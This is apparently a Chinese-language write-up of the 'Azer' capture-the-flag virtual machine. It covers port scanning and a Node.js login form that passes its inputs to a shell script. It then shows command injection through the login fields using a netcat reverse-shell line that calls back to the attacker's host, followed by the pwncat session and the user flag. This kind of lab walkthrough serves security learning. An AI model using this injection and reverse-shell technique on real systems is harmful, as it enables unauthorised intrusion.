Azer
备注
[Linux VM] [Tested on VirtualBox and VMWare.] created by || tasiyanci
⏲️ Release Date // 2024-02-24
✔️ MD5 // 467223b33d6d8150a50b206401236da7
☠ Root // 2
💀 User // 10
📝Notes // My birthday gift to community.
靶机启动
靶机 IP
192.168.56.120
nmap 信息搜集
Nmap scan report for 192.168.56.120
Host is up (0.00044s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.57 ((Debian))
|_http-title: LÖSEV | Lösemili Çocuklar Vakf\xC4\xB1
|_http-server-header: Apache/2.4.57 (Debian)
3000/tcp open http Node.js (Express middleware)
|_http-title: Login Page
web 服务 Port-80
尝试进行目录扫描,但是未得到有价值信息
web 服务 Port-3000
发现一个登录框,首先先简单尝试一下
a:a
Error executing bash script: Command failed: /home/azer/get.sh a a fatal: not a git repository (or any of the parent directories): .git
看到了疑似有脚本执行的部分,尝试执行命令注入执行反向 shell
nc 192.168.56.102 9999 -e /bin/bash : nc 192.168.56.102 9999 -e /bin/bash
成功得到回连的 shell
User - azer
┌─[randark@parrot]─[~]
└──╼ $ pwncat-cs -lp 9999
[15:35:38] Welcome to pwncat 🐈!
[15:45:41] received connection from 192.168.56.120:46168
[15:45:42] 192.168.56.120:46168: registered new host w/ db
(local) pwncat$ back
(remote) azer@azer:/home/azer$ whoami
azer
flag - user
0d2856d69dc348b3af80a0eed67c7502